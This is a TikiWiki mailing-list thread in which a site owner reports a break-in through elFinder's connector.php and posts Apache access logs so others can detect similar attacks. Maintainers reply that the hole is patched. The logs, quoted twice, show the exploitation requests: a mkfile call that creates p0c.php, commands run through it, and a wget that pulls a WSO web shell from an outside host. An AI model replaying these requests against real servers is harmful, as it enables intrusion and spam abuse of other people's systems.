elfinder security problem

classic Classic list List threaded Threaded
4 messages Options
Reply | Threaded
Open this post in threaded view
|

elfinder security problem

Marco Schmidt
Hello,

searching over the mailinglists I didn't find a message related to my
issue.

I just saw (by accident) that somebody broke into my server via elfinder.
My server runs not the newest version 12 (upgrade is on the todo list).
But in the svn-source I saw that elfinder didnot change in the newest
version.

The attacker used the "connector.php" to get access directly to the
filesystem. Some php scripts where added. One to get shell access to the
host and another one with mailer functionality.

Attached you can find the logs.
I hope this helps others to identify a possible break-in.

Greetings ...
 Marco


41.230.44.35 - - [15/Jul/2016:19:08:40 +0200] "GET
/vendor_extra/elfinder/php/connector.php HTTP/1.1" 200 27 "-"
"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like
Gecko) Chrome/51.0.2704.103 Safari/537.36"
41.230.44.35 - - [15/Jul/2016:19:08:41 +0200] "GET /favicon.ico
HTTP/1.1" 200 1150
"http://servername/vendor_extra/elfinder/php/connector.php" "Mozilla/5.0
(Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko)
Chrome/51.0.2704.103 Safari/537.36"
41.230.44.35 - - [15/Jul/2016:19:12:36 +0200] "GET
///vendor_extra/elfinder/php/connector.php?cmd=mkfile&name=p0c.php&target=l1_Lw
HTTP/1.1" 200 134 "-" "Python-urllib/2.7"
41.230.44.35 - - [15/Jul/2016:19:12:36 +0200] "POST
///vendor_extra/elfinder/php/connector.php HTTP/1.1" 200 137 "-"
"Python-urllib/2.7"
41.230.44.35 - - [15/Jul/2016:19:12:38 +0200] "GET
///vendor_extra/elfinder/files/p0c.php?cmd=id HTTP/1.1" 200 66 "-"
"Python-urllib/2.7"
41.230.44.35 - - [15/Jul/2016:19:12:42 +0200] "GET
///vendor_extra/elfinder/files/p0c.php?cmd=ls%20-la HTTP/1.1" 200 284
"-" "Python-urllib/2.7"
41.230.44.35 - - [15/Jul/2016:19:12:46 +0200] "GET
///vendor_extra/elfinder/files/p0c.php?cmd=uname%20-a HTTP/1.1" 200 71
"-" "Python-urllib/2.7"
41.230.44.35 - - [15/Jul/2016:19:13:13 +0200] "GET
///vendor_extra/elfinder/files/p0c.php?cmd=wget%20http%3A//www.w0rms.com/shell/wso.txt%20%26%26%20mv%20wso.txt%20index1.php
HTTP/1.1" 200 - "-" "Python-urllib/2.7"
41.230.44.35 - - [15/Jul/2016:19:13:16 +0200] "GET
///vendor_extra/elfinder/files/p0c.php?cmd=ls%20-la HTTP/1.1" 200 350
"-" "Python-urllib/2.7"
41.230.44.35 - - [15/Jul/2016:19:13:26 +0200] "GET
/vendor_extra/elfinder/files/index1.php HTTP/1.1" 200 3259 "-"
"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like
Gecko) Chrome/51.0.2704.103 Safari/537.36"
41.230.44.35 - - [15/Jul/2016:19:13:41 +0200] "POST
/vendor_extra/elfinder/files/index1.php HTTP/1.1" 200 3313
"http://servername/vendor_extra/elfinder/files/index1.php" "Mozilla/5.0
(Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko)
Chrome/51.0.2704.103 Safari/537.36"
41.230.44.35 - - [15/Jul/2016:19:13:51 +0200] "GET
/vendor_extra/elfinder/files/mailer.php HTTP/1.1" 200 1279 "-"
"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like
Gecko) Chrome/51.0.2704.103 Safari/537.36"
41.230.44.35 - - [15/Jul/2016:19:14:13 +0200] "POST
/vendor_extra/elfinder/files/mailer.php HTTP/1.1" 200 1498
"http://servername/vendor_extra/elfinder/files/mailer.php" "Mozilla/5.0
(Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko)
Chrome/51.0.2704.103 Safari/537.36"
41.230.44.35 - - [15/Jul/2016:19:15:23 +0200] "POST
/vendor_extra/elfinder/files/mailer.php HTTP/1.1" 200 10457
"http://servername/vendor_extra/elfinder/files/mailer.php" "Mozilla/5.0
(Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko)
Chrome/51.0.2704.103 Safari/537.36"
41.230.44.35 - - [15/Jul/2016:19:17:58 +0200] "POST
/vendor_extra/elfinder/files/mailer.php HTTP/1.1" 200 307013
"http://servername/vendor_extra/elfinder/files/mailer.php" "Mozilla/5.0
(Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko)
Chrome/51.0.2704.103 Safari/537.36"
178.241.194.8 - - [15/Jul/2016:19:49:08 +0200] "GET
/vendor_extra/elfinder/files/index1.php HTTP/1.1" 200 3311
"http://w0rms.com/oku/sayfa.php?sayfa=1" "Mozilla/5.0 (Windows NT 6.1;
rv:41.0) Gecko/20100101 Firefox/41.0"
178.241.194.8 - - [15/Jul/2016:19:49:17 +0200] "POST
/vendor_extra/elfinder/files/index1.php HTTP/1.1" 200 24586
"http://servername/vendor_extra/elfinder/files/index1.php" "Mozilla/5.0
(Windows NT 6.1; rv:41.0) Gecko/20100101 Firefox/41.0"
178.241.194.8 - - [15/Jul/2016:19:50:28 +0200] "POST
/vendor_extra/elfinder/files/index1.php HTTP/1.1" 200 3203
"http://servername/vendor_extra/elfinder/files/index1.php" "Mozilla/5.0
(Windows NT 6.1; rv:41.0) Gecko/20100101 Firefox/41.0"
178.241.194.8 - - [15/Jul/2016:19:50:47 +0200] "POST
/vendor_extra/elfinder/files/index1.php HTTP/1.1" 200 3304
"http://servername/vendor_extra/elfinder/files/index1.php" "Mozilla/5.0
(Windows NT 6.1; rv:41.0) Gecko/20100101 Firefox/41.0"
178.241.194.8 - - [15/Jul/2016:19:53:26 +0200] "GET
/vendor_extra/elfinder/files/index1.php HTTP/1.1" 200 3311 "-"
"Mozilla/5.0 (Windows NT 6.1; rv:41.0) Gecko/20100101 Firefox/41.0"

------------------------------------------------------------------------------
What NetFlow Analyzer can do for you? Monitors network bandwidth and traffic
patterns at an interface-level. Reveals which users, apps, and protocols are
consuming the most bandwidth. Provides multi-vendor support for NetFlow,
J-Flow, sFlow and other flows. Make informed decisions using capacity planning
reports.http://sdm.link/zohodev2dev
_______________________________________________
TikiWiki-users mailing list
[hidden email]
https://lists.sourceforge.net/lists/listinfo/tikiwiki-users
Reply | Threaded
Open this post in threaded view
|

Re: elfinder security problem

Xavier de Pedro (Tiki)
Hi Marco:

Yes, thanks for the information. This issue/hole is patched in the last release available since days ago, once you perform a standard upgrade to latest 12.x in your case, using either the upgrade through the tiki-install.php web interface, or with "php console.php d:u" as usual on the terminal.

And for next times, please do not report this type of information in public channels such as this list but send the information to [hidden email]

Thanks!

Xavi

On 15 juliol de 2016 21:03:02 CEST, Marco Schmidt <[hidden email]> wrote:
Hello,

searching over the mailinglists I didn't find a message related to my
issue.

I just saw (by accident) that somebody broke into my server via elfinder.
My server runs not the newest version 12 (upgrade is on the todo list).
But in the svn-source I saw that elfinder didnot change in the newest
version.

The attacker used the "connector.php" to get access directly to the
filesystem. Some php scripts where added. One to get shell access to the
host and another one with mailer functionality.

Attached you can find the logs.
I hope this helps others to identify a possible break-in.

Greetings ...
Marco


41.230.44.35 - - [15/Jul/2016:19:08:40 +0200] "GET
/vendor_extra/elfinder/php/connector.php HTTP/1.1" 200 27 "-"
"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like
Gecko) Chrome/51.0.2704.103 Safari/537.36"
41.230.44.35 - - [15/Jul/2016:19:08:41 +0200] "GET /favicon.ico
HTTP/1.1" 200 1150
"http://servername/vendor_extra/elfinder/php/connector.php" "Mozilla/5.0
(Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko)
Chrome/51.0.2704.103 Safari/537.36"
41.230.44.35 - - [15/Jul/2016:19:12:36 +0200] "GET
///vendor_extra/elfinder/php/connector.php?cmd=mkfile&name=p0c.php&target=l1_Lw
HTTP/1.1" 200 134 "-" "Python-urllib/2.7"
41.230.44.35 - - [15/Jul/2016:19:12:36 +0200] "POST
///vendor_extra/elfinder/php/connector.php HTTP/1.1" 200 137 "-"
"Python-urllib/2.7"
41.230.44.35 - - [15/Jul/2016:19:12:38 +0200] "GET
///vendor_extra/elfinder/files/p0c.php?cmd=id HTTP/1.1" 200 66 "-"
"Python-urllib/2.7"
41.230.44.35 - - [15/Jul/2016:19:12:42 +0200] "GET
///vendor_extra/elfinder/files/p0c.php?cmd=ls%20-la HTTP/1.1" 200 284
"-" "Python-urllib/2.7"
41.230.44.35 - - [15/Jul/2016:19:12:46 +0200] "GET
///vendor_extra/elfinder/files/p0c.php?cmd=uname%20-a HTTP/1.1" 200 71
"-" "Python-urllib/2.7"
41.230.44.35 - - [15/Jul/2016:19:13:13 +0200] "GET
///vendor_extra/elfinder/files/p0c.php?cmd=wget%20http%3A//www.w0rms.com/shell/wso.txt%20%26%26%20mv%20wso.txt%20index1.php
HTTP/1.1" 200 - "-" "Python-urllib/2.7"
41.230.44.35 - - [15/Jul/2016:19:13:16 +0200] "GET
///vendor_extra/elfinder/files/p0c.php?cmd=ls%20-la HTTP/1.1" 200 350
"-" "Python-urllib/2.7"
41.230.44.35 - - [15/Jul/2016:19:13:26 +0200] "GET
/vendor_extra/elfinder/files/index1.php HTTP/1.1" 200 3259 "-"
"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like
Gecko) Chrome/51.0.2704.103 Safari/537.36"
41.230.44.35 - - [15/Jul/2016:19:13:41 +0200] "POST
/vendor_extra/elfinder/files/index1.php HTTP/1.1" 200 3313
"http://servername/vendor_extra/elfinder/files/index1.php" "Mozilla/5.0
(Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko)
Chrome/51.0.2704.103 Safari/537.36"
41.230.44.35 - - [15/Jul/2016:19:13:51 +0200] "GET
/vendor_extra/elfinder/files/mailer.php HTTP/1.1" 200 1279 "-"
"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like
Gecko) Chrome/51.0.2704.103 Safari/537.36"
41.230.44.35 - - [15/Jul/2016:19:14:13 +0200] "POST
/vendor_extra/elfinder/files/mailer.php HTTP/1.1" 200 1498
"http://servername/vendor_extra/elfinder/files/mailer.php" "Mozilla/5.0
(Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko)
Chrome/51.0.2704.103 Safari/537.36"
41.230.44.35 - - [15/Jul/2016:19:15:23 +0200] "POST
/vendor_extra/elfinder/files/mailer.php HTTP/1.1" 200 10457
"http://servername/vendor_extra/elfinder/files/mailer.php" "Mozilla/5.0
(Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko)
Chrome/51.0.2704.103 Safari/537.36"
41.230.44.35 - - [15/Jul/2016:19:17:58 +0200] "POST
/vendor_extra/elfinder/files/mailer.php HTTP/1.1" 200 307013
"http://servername/vendor_extra/elfinder/files/mailer.php" "Mozilla/5.0
(Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko)
Chrome/51.0.2704.103 Safari/537.36"
178.241.194.8 - - [15/Jul/2016:19:49:08 +0200] "GET
/vendor_extra/elfinder/files/index1.php HTTP/1.1" 200 3311
"http://w0rms.com/oku/sayfa.php?sayfa=1" "Mozilla/5.0 (Windows NT 6.1;
rv:41.0) Gecko/20100101 Firefox/41.0"
178.241.194.8 - - [15/Jul/2016:19:49:17 +0200] "POST
/vendor_extra/elfinder/files/index1.php HTTP/1.1" 200 24586
"http://servername/vendor_extra/elfinder/files/index1.php" "Mozilla/5.0
(Windows NT 6.1; rv:41.0) Gecko/20100101 Firefox/41.0"
178.241.194.8 - - [15/Jul/2016:19:50:28 +0200] "POST
/vendor_extra/elfinder/files/index1.php HTTP/1.1" 200 3203
"http://servername/vendor_extra/elfinder/files/index1.php" "Mozilla/5.0
(Windows NT 6.1; rv:41.0) Gecko/20100101 Firefox/41.0"
178.241.194.8 - - [15/Jul/2016:19:50:47 +0200] "POST
/vendor_extra/elfinder/files/index1.php HTTP/1.1" 200 3304
"http://servername/vendor_extra/elfinder/files/index1.php" "Mozilla/5.0
(Windows NT 6.1; rv:41.0) Gecko/20100101 Firefox/41.0"
178.241.194.8 - - [15/Jul/2016:19:53:26 +0200] "GET
/vendor_extra/elfinder/files/index1.php HTTP/1.1" 200 3311 "-"
"Mozilla/5.0 (Windows NT 6.1; rv:41.0) Gecko/20100101 Firefox/41.0"



What NetFlow Analyzer can do for you? Monitors network bandwidth and traffic
patterns at an interface-level. Reveals which users, apps, and protocols are
consuming the most bandwidth. Provides multi-vendor support for NetFlow,
J-Flow, sFlow and other flows. Make informed decisions using capacity planning
reports.http://sdm.link/zohodev2dev


TikiWiki-users mailing list
[hidden email]
https://lists.sourceforge.net/lists/listinfo/tikiwiki-users

--
Sent from my Android device with K-9 Mail. Please excuse my brevity.
------------------------------------------------------------------------------
What NetFlow Analyzer can do for you? Monitors network bandwidth and traffic
patterns at an interface-level. Reveals which users, apps, and protocols are
consuming the most bandwidth. Provides multi-vendor support for NetFlow,
J-Flow, sFlow and other flows. Make informed decisions using capacity planning
reports.http://sdm.link/zohodev2dev
_______________________________________________
TikiWiki-users mailing list
[hidden email]
https://lists.sourceforge.net/lists/listinfo/tikiwiki-users
Reply | Threaded
Open this post in threaded view
|

Re: elfinder security problem

Marco Schmidt
Hello Xavi,

your right, such a security report should not be sent to a public channel.

It would be perfect to put a line of note somewhere on the sourceforge
project page which gives a hint to the security email address. Maybe on
the "Support" page?

I upgraded now to 12.9 and I will go for 15, as soon as I converted my
theme to the new theme structure.

Greetings ...
 Marco


On 16.07.2016 00:13, Xavier de Pedro wrote:

> Hi Marco:
>
> Yes, thanks for the information. This issue/hole is patched in the last
> release available since days ago, once you perform a standard upgrade to
> latest 12.x in your case, using either the upgrade through the
> tiki-install.php web interface, or with "php console.php d:u" as usual
> on the terminal.
>
> And for next times, please do not report this type of information in
> public channels such as this list but send the information to
> [hidden email]
>
> Thanks!
>
> Xavi

------------------------------------------------------------------------------
What NetFlow Analyzer can do for you? Monitors network bandwidth and traffic
patterns at an interface-level. Reveals which users, apps, and protocols are
consuming the most bandwidth. Provides multi-vendor support for NetFlow,
J-Flow, sFlow and other flows. Make informed decisions using capacity planning
reports.http://sdm.link/zohodev2dev
_______________________________________________
TikiWiki-users mailing list
[hidden email]
https://lists.sourceforge.net/lists/listinfo/tikiwiki-users
Reply | Threaded
Open this post in threaded view
|

Re: elfinder security problem

Xavier de Pedro (Tiki)
Thanks, marco, I didn't know how to change the support info page at
sf.net for our project, therefore I added a quick note in the summary
page with the few characters left to add info there:
https://sourceforge.net/projects/tikiwiki/

Thanks!

Xavi

El 18/07/16 a les 10:34, Marco Schmidt ha escrit:

> Hello Xavi,
>
> your right, such a security report should not be sent to a public channel.
>
> It would be perfect to put a line of note somewhere on the sourceforge
> project page which gives a hint to the security email address. Maybe on
> the "Support" page?
>
> I upgraded now to 12.9 and I will go for 15, as soon as I converted my
> theme to the new theme structure.
>
> Greetings ...
>  Marco
>
>
> On 16.07.2016 00:13, Xavier de Pedro wrote:
>> Hi Marco:
>>
>> Yes, thanks for the information. This issue/hole is patched in the last
>> release available since days ago, once you perform a standard upgrade to
>> latest 12.x in your case, using either the upgrade through the
>> tiki-install.php web interface, or with "php console.php d:u" as usual
>> on the terminal.
>>
>> And for next times, please do not report this type of information in
>> public channels such as this list but send the information to
>> [hidden email]
>>
>> Thanks!
>>
>> Xavi


------------------------------------------------------------------------------
What NetFlow Analyzer can do for you? Monitors network bandwidth and traffic
patterns at an interface-level. Reveals which users, apps, and protocols are
consuming the most bandwidth. Provides multi-vendor support for NetFlow,
J-Flow, sFlow and other flows. Make informed decisions using capacity planning
reports.http://sdm.link/zohodev2dev
_______________________________________________
TikiWiki-users mailing list
[hidden email]
https://lists.sourceforge.net/lists/listinfo/tikiwiki-users